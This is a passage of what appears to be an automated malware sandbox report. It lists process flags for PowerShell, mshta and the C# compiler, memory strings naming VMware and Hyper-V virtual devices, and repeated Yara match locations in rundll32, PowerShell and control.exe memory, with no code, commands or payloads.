Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: explorer.exe, 00000020.00000000.534777176.00000000080ED000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d |
Source: explorer.exe, 00000020.00000000.510384320.0000000000680000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _VMware_SATA_CD00#5&280b647& |
Source: explorer.exe, 00000020.00000000.510434477.000000000069D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWen-USnd |
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00 |
Source: explorer.exe, 00000020.00000000.534777176.00000000080ED000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: 6e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA |
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t] |
Source: RuntimeBroker.exe, 00000027.00000000.559967386.000001C95EA58000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}so |
Source: explorer.exe, 00000020.00000000.529687334.00000000062C4000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000020.00000000.489068719.0000000004287000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0 |
Source: rundll32.exe, 00000003.00000002.520703269.0000000003478000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.520169879.000000000340A000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^ |
Source: explorer.exe, 00000020.00000000.534777176.00000000080ED000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 00000020.00000000.498754541.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00l |
Source: Yara match |
File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347592975.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347464949.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347651204.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.395328868.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347373616.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347625581.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347667655.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347551672.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000003.473788937.0000020C7835C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.347265097.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.454702923.0000000006628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472223678.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394403969.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.392369617.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000003.472064443.00000289C07CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 344, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 720, type: MEMORYSTR |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.51194a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.5796940.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.rundll32.exe.5240000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.57694a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.56ea4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000003.517576476.0000000005119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.524999035.000000000546F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469785731.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.469105501.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.518835628.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001E.00000000.471017124.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394225143.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.394254526.0000000005769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |